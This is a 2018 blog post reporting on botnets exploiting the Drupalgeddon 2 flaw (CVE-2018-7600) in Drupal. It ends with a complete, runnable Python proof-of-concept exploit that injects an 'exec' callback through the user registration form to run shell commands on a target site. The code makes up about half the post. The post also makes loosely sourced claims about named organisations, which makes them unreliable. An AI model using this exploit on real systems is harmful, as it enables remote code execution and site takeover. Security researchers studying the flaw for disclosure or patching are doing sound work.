Drupalgeddon 2 Drupal vulnerability exploiting botnets emerge

Submitted by dryer on Thu, 04/19/2018 - 12:13
exploited Drupal

Several weeks after responsible hosters have patched their installations for Drupalgeddon 2, there are still many unpatched installations out there. Originally the vulnerabilities were unveiled in late March. After Checkpoint did their piece on uncovering Drupalgeddon 2, exploiters have activated on the issue.

Now there are several botnets exploiting unpatched installations. Drupal 7 continues to be the most popular version of Drupal, but Drupal 8 has some adoption as well. Notable Drupal users like Cambridge Analytica continue to run vulnerable versions of Drupal 8 and this could become a serious issue for organisations like for Mossack-Fonseca. The company leaked the Panama Papers via Drupal in 2016.

Automatic botnets exploiting any installations are now running at large on the internet, ready to exploit the Open Source content management system. Drupal lags behind WordPress in popularity, after choosing to challenge SharePoint an other tools in the enterprise market. However there are are still thousands of installations of Drupal in the world that are vulnerable.

Drupal installations exploited with botnets

The botnets exploiting CVE-2018-7600 are now being rapidly uncovered by security experts: 

Early warning, three tsunami botnet variants utilizing Drupal_RCE #CVE_2018_7600 is actively spreading since yesterday, we have logged 10+ C2s, will provide more update on our blog tomorrow. - Netlab 360

These vulnerability exploiting botnets are using to install malware such as cryptocurrency and backdoors to unsecure Drupal sites. The Drupalgeddon 2 patterns match attacks against Oracle products before, so it matches the Enterprise profile of Drupal. More information on other blogs:

All users of the Drupal Content Management System are recommended to upgrade to the latest version to avoid security breaches.

Drupalgeddon 2 exploit example

An example exploit for CVE-2018-7600 written in Python is available as a public example on GitHub:

#!/usr/bin/env python3
import sys
import requests

print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')

target = input('Enter target url (example: https://domain.ltd/): ')

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https

# example:
# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# verify = False
proxies = {}
verify = True

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}

r = requests.post(url, proxies=proxies, data=payload, verify=verify)
check = requests.get(target + 'hello.txt', verify=verify)
if check.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')